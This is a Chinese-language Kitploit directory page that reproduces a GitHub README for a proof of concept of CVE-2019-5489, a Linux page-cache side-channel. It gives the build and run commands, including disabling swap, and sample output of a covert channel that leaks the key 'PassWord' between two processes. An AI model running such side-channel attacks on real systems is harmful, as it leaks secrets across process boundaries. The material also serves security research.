Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-5489 — Linux 的页缓存侧信道攻击 (CVE-2019-5489) 概念验证 | Kitploit
工具/GitHubGitHub/mmxsrup/cve-2019-5489
漏洞分析漏洞利用信息收集论文与研究学习与教育二进制利用
GitHubmmxsrup/cve-2019-5489

CVE-2019-5489

Linux 的页缓存侧信道攻击 (CVE-2019-5489) 概念验证

查看仓库
10324年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE 2019-5489

本仓库包含针对Linux的页面缓存侧信道攻击(CVE-2019-5489)的概念验证代码。

为了评估页面缓存侧信道,我在两个进程之间实现了隐蔽信道。 发送进程通过页面缓存侧信道向接收进程发送机密数据。 页面缓存攻击已在Linux内核5.0及更高版本中得到缓解,因此此PoC仅能在Linux内核5.0之前版本中起作用。

注意:我在Ubuntu 18.04、Linux 4.15.0-70上测试通过。

构建

运行以下命令。

root@kitploit:~
git clone https://github.com/mmxsrup/CVE-2019-5489
cd CVE-2019-5489
make

运行

禁用交换空间以简化攻击。

root@kitploit:~
swapoff -a

终端1

首先,在终端1上运行以下命令。

root@kitploit:~
make run-sender

终端2

当终端1输出 sending 1th character ... 后,运行以下命令。

root@kitploit:~
make run-receiver

输出

如果执行成功,将输出以下内容。
这表明密钥已通过页面缓存侧信道从发送进程发送到接收进程。

终端1

root@kitploit:~
LD_LIBRARY_PATH=. ./sender
Sender process
ecicting page cache ...
sending 1th character ...
ecicting page cache ...
sending 2th character ...
ecicting page cache ...
sending 3th character ...
ecicting page cache ...
sending 4th character ...
ecicting page cache ...
sending 5th character ...
ecicting page cache ...
sending 6th character ...
ecicting page cache ...
sending 7th character ...
ecicting page cache ...
sending 8th character ...
ecicting page cache ...
sending 9th character ...

终端2

root@kitploit:~
LD_LIBRARY_PATH=. ./receiver
Sender process
waiting ...
recved caracter(P)
waiting ...
recved caracter(a)
waiting ...
recved caracter(s)
waiting ...
recved caracter(s)
waiting ...
recved caracter(W)
waiting ...
recved caracter(o)
waiting ...
recved caracter(r)
waiting ...
recved caracter(d)
waiting ...
recved caracter()
Received key: PassWord

参考文献

  • Daniel Gruss et al. Page cache attacks [CCS 19]
下载工具